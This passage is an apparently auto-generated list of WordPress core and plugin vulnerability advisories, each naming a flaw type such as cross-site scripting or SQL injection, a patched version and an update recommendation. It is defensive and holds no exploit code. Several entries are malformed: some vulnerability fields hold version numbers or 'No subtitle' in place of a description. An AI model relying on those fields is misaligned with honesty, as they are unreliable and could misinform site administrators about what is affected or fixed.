Recommended Action: Update to version 1.0.12, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6.6
Recommended Action: Update to version 2.6.6, or a newer patched version

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: SQL Injection
Patched Version: 1.4.96
Recommended Action: Update to version 1.4.96, or a newer patched version

Plugin: WPBakery Page Builder for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 6.13.0
Recommended Action: Update to version 6.13.0, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.1.9
Recommended Action: Update to version 2.5.1.9, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 1.5.1.2
Recommended Action: Update to version 1.5.1.2, or a newer patched version

Plugin: SearchAutocomplete

Vulnerability: SQL Injection
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: AnyComment

Vulnerability: Open Redirect via redirect parameter
Patched Version: 0.3.5
Recommended Action: Update to version 0.3.5, or a newer patched version

Plugin: CURCY – Multi Currency for WooCommerce – The best free currency exchange plugin – Run smoothly on WooCommerce 8.x

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.18
Recommended Action: Update to version 2.1.18, or a newer patched version

Plugin: YARPP – Yet Another Related Posts Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.2.5
Recommended Action: Update to version 4.2.5, or a newer patched version

Plugin: Flamingo

Vulnerability: CSV Injection
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: WP Spell Check

Vulnerability: Cross-Site Request Forgery
Patched Version: 9.13
Recommended Action: Update to version 9.13, or a newer patched version

Plugin: Better Font Awesome

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Avenir-soft Direct Download

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Tidio – Live Chat & AI Chatbots

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: Most Popular Posts Widget

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 0.9
Recommended Action: Update to version 0.9, or a newer patched version

Plugin: Easyship WooCommerce Shipping Rates

Vulnerability: Missing Authorization via multiple AJAX actions
Patched Version: 0.9.1
Recommended Action: Update to version 0.9.1, or a newer patched version

Plugin: Tinymce Thumbnail Gallery

Vulnerability: Local File Inclusion
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: BBSpoiler

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Login Security and History

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Stored Cross-Site Scripting via Block Editor
Patched Version: 3.7.32
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.32, 3.8.32, 3.9.30, 4.0.29, 4.1.29, 4.2.26, 4.3.22, 4.4.21, 4.5.20, 4.6.17, 4.7.16, 4.8.12, 4.9.13, 5.0.8, 5.1.4, 5.2.5, 5.3.1

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Open Redirect
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Appointment Booking Calendar

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.19
Recommended Action: Update to version 1.3.19, or a newer patched version

Plugin: PixelYourSite – Your smart PIXEL (TAG) & API Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.3.0
Recommended Action: Update to version 5.3.0, or a newer patched version

Plugin: Internal Link Building

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gallery Images Ape

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Basic Elements

Vulnerability: Cross-Site Request Forgery via wpbe_save_settings
Patched Version: 5.3.0
Recommended Action: Update to version 5.3.0, or a newer patched version

Plugin: Multilanguage by BestWebSoft – WordPress Translation Plugin and Language Switcher

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Age Verify

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.2.9
Recommended Action: Update to version 0.2.9, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Cross-Site Request Forgery to Order Message Update
Patched Version: 3.9.7
Recommended Action: Update to version 3.9.7, or a newer patched version

Plugin: SlideShare for WordPress by Yoast

Vulnerability: Admin+ Cross-Site Scripting
Patched Version: 1.9.2
Recommended Action: Update to version 1.9.2, or a newer patched version

Plugin: Simple Blog Card

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.31
Recommended Action: Update to version 1.31, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 14.0.0
Recommended Action: Update to version 14.0.0, or a newer patched version

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: Not specified in this entry (affects versions up to 5.5.2)
Patched Version: 6.0.0
Recommended Action: Update to version 6.0.0, or a newer patched version

Plugin: LayerSlider

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 7.1.2
Recommended Action: Update to version 7.1.2, or a newer patched version

Plugin: Guest Author

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: SQL Injection
Patched Version: 2.1.79
Recommended Action: Update to version 2.1.79, or a newer patched version

Plugin: Import and export users and customers

Vulnerability: Cross-Site Scripting
Patched Version: 1.14.1.3
Recommended Action: Update to version 1.14.1.3, or a newer patched version

Plugin: Progress Bar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via wppb shortcode
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: MainWP Dashboard: WordPress Management without the SaaS

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 4.4.3.4
Recommended Action: Update to version 4.4.3.4, or a newer patched version

Plugin: AddToAny Share Buttons

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.7.46
Recommended Action: Update to version 1.7.46, or a newer patched version

Plugin: Simple Membership

Vulnerability: Membership Privilege Escalation
Patched Version: 4.1.3
Recommended Action: Update to version 4.1.3, or a newer patched version

Plugin: WooCommerce PDF Invoices, Packing Slips, Delivery Notes and Shipping Labels

Vulnerability: Authenticated (Shop Manager+) Arbitrary Options Update via JSON Import
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: Visual Form Builder

Vulnerability: Authenticated SQL Injection
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: RSVP and Event Management

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: BetterLinks – An Advanced Solution for Affiliate Link Management, Link Shortening, Link Tracking, Link Branding & Marketing

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Backup by Supsystic

Vulnerability: Cross-Site Request Forgery to Arbitrary File Download/Deletion
Patched Version: 2.3.12
Recommended Action: Update to version 2.3.12, or a newer patched version

Plugin: CRM Perks Forms – WordPress Form Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: MDC YouTube Downloader

Vulnerability: Directory Traversal
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Structured Content (JSON-LD) #wpsc

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Dynamics 365 Integration

Vulnerability: Cross-Site Request Forgery via wp_ajax_wpcrm_log
Patched Version: 1.3.13
Recommended Action: Update to version 1.3.13, or a newer patched version

Plugin: Simple Download Monitor

Vulnerability: Contributor+ Arbitrary File Download
Patched Version: 3.9.5
Recommended Action: Update to version 3.9.5, or a newer patched version

Plugin: Custom Post Types and Custom Fields creator – WCK

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: 3D Product configurator for WooCommerce

Vulnerability: Arbitrary File Deletion
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: Beaver Builder – WordPress Page Builder

Vulnerability: Authenticated Stored Cross-Site Scripting via Image URL
Patched Version: 2.5.5.3
Recommended Action: Update to version 2.5.5.3, or a newer patched version

Plugin: Ninja Popups

Vulnerability: Open Redirect
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Conditional cart fee / Extra charge rule for WooCommerce extra fees

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.97
Recommended Action: Update to version 1.0.97, or a newer patched version

Plugin: Related Posts for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: Just Custom Fields

Vulnerability: Cross-Site Request Forgery on AJAX Actions
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WCFM – Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.6.0
Recommended Action: Update to version 6.6.0, or a newer patched version

Plugin: WP Social Bookmarking Light

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Donations Made Easy – Smart Donations

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Side Menu Lite – add sticky fixed buttons

Vulnerability: Cross-Site Request Forgery to Item Deletion
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: GTM4WP – A Google Tag Manager (GTM) plugin for WordPress

Vulnerability: Cross-Site Scripting via Cloudflare Country Code
Patched Version: 1.15.1
Recommended Action: Update to version 1.15.1, or a newer patched version

Plugin: Cookie Information | Free GDPR Consent Solution

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Slick Social Share Buttons

Vulnerability: Authenticated (Subscriber+) Arbitrary Option Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Comments – wpDiscuz

Vulnerability: wpDiscuz <= 5.3.5
Patched Version: 5.3.6
Recommended Action: Update to version 5.3.6, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.9.61
Recommended Action: Update to version 2.9.61, or a newer patched version

Plugin: Photo Gallery by Ays – Responsive Image Gallery

Vulnerability: SQL Injection
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: VDZ VERIFICATION (Custom Meta Tags)

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Membership Plugin – Restrict Content

Vulnerability: Missing Authorization to Notice Dismissal
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: Password Protected – Password Protect your WordPress Site, Pages, & WooCommerce Products – Restrict Content, Protect WooCommerce Category, and more

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.6.3
Recommended Action: Update to version 2.6.3, or a newer patched version

Plugin: Ultimate Dashboard – Custom WordPress Dashboard

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 3.7.8
Recommended Action: Update to version 3.7.8, or a newer patched version

Plugin: WP Remote Site Search

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Ibtana – WordPress Website Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.1.8.8
Recommended Action: Update to version 1.1.8.8, or a newer patched version

Plugin: WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt charts

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Unauthenticated Arbitrary File Download
Patched Version: 18.3
Recommended Action: Update to version 18.3, or a newer patched version

Plugin: Cookies and Content Security Policy

Vulnerability: Sensitive Information Exposure
Patched Version: 2.16
Recommended Action: Update to version 2.16, or a newer patched version

Core: WordPress MU

Vulnerability: Full Path Disclosure
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: WPDating

Vulnerability: Arbitrary File Upload
Patched Version: 7.4.2
Recommended Action: Update to version 7.4.2, or a newer patched version

Plugin: WP Visitor Statistics (Real Time Traffic)

Vulnerability: Unauthenticated SQL Injection
Patched Version: 5.8
Recommended Action: Update to version 5.8, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: SQL Injection via tutor_quiz_builder_get_question_form
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Download Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.43
Recommended Action: Update to version 3.2.43, or a newer patched version

Plugin: WP Mail Logging

Vulnerability: Unauthenticated Arbitrary Settings Change
Patched Version: 1.10.0
Recommended Action: Update to version 1.10.0, or a newer patched version

Plugin: ЮKassa для WooCommerce

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Information Disclosure
Patched Version: 13.2.6
Recommended Action: Update to version 13.2.6, or a newer patched version

Plugin: WP Glossary

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GD bbPress Attachments

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Product Feed Manager- WooCommerce Product Feeds For Google Shopping, Social Catalog, TikTok Ads, and 180+ Popular Marketplaces

Vulnerability: Authenticated (Admin+) Directory Traversal
Patched Version: 7.3.16
Recommended Action: Update to version 7.3.16, or a newer patched version

Plugin: JS Help Desk – The Ultimate Help Desk & Support Plugin

Vulnerability: Unauthenticated SQL Injection via email and trackingid
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: Mingle Forum

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.35
Recommended Action: Update to version 1.0.35, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Information Disclosure
Patched Version: 3.6.75
Recommended Action: Update to version 3.6.75, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Cross-Site Request Forgery to Product Deletion
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Delete Me

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: MDTF – Meta Data and Taxonomies Filter

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Tiempo.com

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SimpleMap Store Locator

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BuddyPress Docs

Vulnerability: Authorization Bypass
Patched Version: 1.9.3
Recommended Action: Update to version 1.9.3, or a newer patched version

Plugin: Custom Admin Page by BestWebSoft – Configurable WordPress Dashboard Pages Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.1.2
Recommended Action: Update to version 0.1.2, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Missing Authorization
Patched Version: 3.9.7
Recommended Action: Update to version 3.9.7, or a newer patched version

Plugin: Ocean Extra

Vulnerability: Unauthenticated Options Update and CSS Injection
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: FL3R FeelBox

Vulnerability: Cross-Site Request Forgery leading to Plugin Settings Reset
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Hotel Booking Lite

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 4.7.0
Recommended Action: Update to version 4.7.0, or a newer patched version

Plugin: Stamped.io Product Reviews & UGC for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: My Shortcodes

Vulnerability: Missing Authorization via Multiple AJAX Actions
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Activity Log – Monitor & Record User Changes

Vulnerability: 2.6.1
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: Recent Backups

Vulnerability: Directory Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Math Comment Spam Protection

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: PHP Everywhere

Vulnerability: Remote Code Execution by Contributor+ users via Gutenberg block
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Simple Membership

Vulnerability: Cross-Site Request Forgery to Arbitrary Transaction Deletion
Patched Version: 4.1.0
Recommended Action: Update to version 4.1.0, or a newer patched version

Plugin: Spotlight Social Feeds – Block, Shortcode, and Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Core: WordPress

Vulnerability: No subtitle
Patched Version: 3.7.5
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.5, 3.8.5, 3.9.3, 4.0.1

Plugin: WP Docs

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WP-DBManager

Vulnerability: Command Injection
Patched Version: 2.72
Recommended Action: Update to version 2.72, or a newer patched version

Plugin: Better Search – Relevant search results for WordPress

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.5.3
Recommended Action: Update to version 2.5.3, or a newer patched version

Plugin: Alpine Photo Tile for Instagram

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.10
Recommended Action: Update to version 1.2.10, or a newer patched version

Plugin: JetTabs for Elementor

Vulnerability: Missing Authorization to Unauthenticated Unauthorized Action
Patched Version: 2.1.25.2
Recommended Action: Update to version 2.1.25.2, or a newer patched version

Plugin: Simple Schools Staff Directory

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Login rebuilder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: FormBuilder

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.08
Recommended Action: Update to version 1.08, or a newer patched version

Plugin: BBS e-Popup

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Analytics Stats Counter Statistics

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPAdmin AWS CDN

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Crowdsignal Dashboard – Polls, Surveys & more

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.25
Recommended Action: Update to version 2.0.25, or a newer patched version

Plugin: Five Star Restaurant Menu and Food Ordering

Vulnerability: Unauthenticated Arbitrary Object Deserialization leading to Remote Code Execution
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Export Media URLs

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: WP-TopBar

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Job Manager

Vulnerability: Cross-Site Scripting
Patched Version: 0.7.19
Recommended Action: Update to version 0.7.19, or a newer patched version

Plugin: rtMedia for WordPress, BuddyPress and bbPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.10.2
Recommended Action: Update to version 3.10.2, or a newer patched version

Core: WordPress MU

Vulnerability: Username Enumeration
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: KB Support – Customer Support Ticket & Helpdesk Plugin, Knowledge Base Plugin

Vulnerability: Missing Authorization to Sensitive Data Exposure
Patched Version: 1.5.89
Recommended Action: Update to version 1.5.89, or a newer patched version

Plugin: WooCommerce

Vulnerability: Sensitive Information Exposure
Patched Version: 7.9.0
Recommended Action: Update to version 7.9.0, or a newer patched version

Plugin: Tradetracker-Store

Vulnerability: Authenticated SQL Injection
Patched Version: 4.6.60
Recommended Action: Update to version 4.6.60, or a newer patched version

Plugin: DethemeKit For Elementor

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.5.5.5
Recommended Action: Update to version 1.5.5.5, or a newer patched version

Plugin: Stripe Add-on for iThemes Exchange

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Pz-LinkCard

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.5.2
Recommended Action: Update to version 2.4.5.2, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.6.5
Recommended Action: Update to version 3.6.5, or a newer patched version

Plugin: URL Shortify – Simple, Powerful and Easy URL Shortener Plugin For WordPress

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Referrer Header
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: WP Shamsi – افزونه تاریخ شمسی و فارسی ساز وردپرس

Vulnerability: Missing Authorization to Arbitrary Plugin Deactivation
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: WP Affiliate Platform

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 6.4.0
Recommended Action: Update to version 6.4.0, or a newer patched version

Plugin: Rencontre – Dating Site

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 3.2.2
Recommended Action: Update to version 3.2.2, or a newer patched version

Plugin: Blog2Social: Social Media Auto Post & Scheduler

Vulnerability: SQL Injection
Patched Version: 5.6.0
Recommended Action: Update to version 5.6.0, or a newer patched version

Plugin: Meta Box

Vulnerability: Mishandling of File Upload
Patched Version: 4.16.2
Recommended Action: Update to version 4.16.2, or a newer patched version

Plugin: Running Line

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX

Vulnerability: Gutenberg Blocks for Post Grid <= 2.4.9
Patched Version: 2.4.10
Recommended Action: Update to version 2.4.10, or a newer patched version

Plugin: Clone

Vulnerability: Missing Authorization via wp_ajax_tifm_save_decision
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: audio-player

Vulnerability: Cross-Site Scripting via playerID Parameter
Patched Version: 2.0.4.6
Recommended Action: Update to version 2.0.4.6, or a newer patched version

Plugin: NewStatPress

Vulnerability: SQL Injection
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Database Backup for WordPress

Vulnerability: Missing Authorization
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: Matterport Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: DX Delete Attached Media

Vulnerability: Missing Authorization to Settings Update
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: 7.5.2.727
Patched Version: 7.5.3.727
Recommended Action: Update to version 7.5.3.727, or a newer patched version

Plugin: Nextend Social Login and Register

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: Kadence WooCommerce Email Designer

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.12
Recommended Action: Update to version 1.5.12, or a newer patched version

Core: WordPress

Vulnerability: 5.8
Patched Version: 5.4.7
Recommended Action: Update to one of the following versions, or a newer patched version: 5.4.7, 5.5.6, 5.6.5, 5.7.3, 5.8.1

Plugin: Welcart e-Commerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Sunshine Photo Cart: Free Client Photo Galleries for Photographers

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.9.14
Recommended Action: Update to version 2.9.14, or a newer patched version

Plugin: Randomize

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Table Reloaded

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.4
Recommended Action: Update to version 1.9.4, or a newer patched version

Plugin: Mukioplayer For WordPress

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BadgeOS

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Authenticated (Subscriber+) Server-Side Request Forgery
Patched Version: 5.12.7
Recommended Action: Update to version 5.12.7, or a newer patched version

Plugin: wp-cal

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Eyes Only: User Access Shortcode

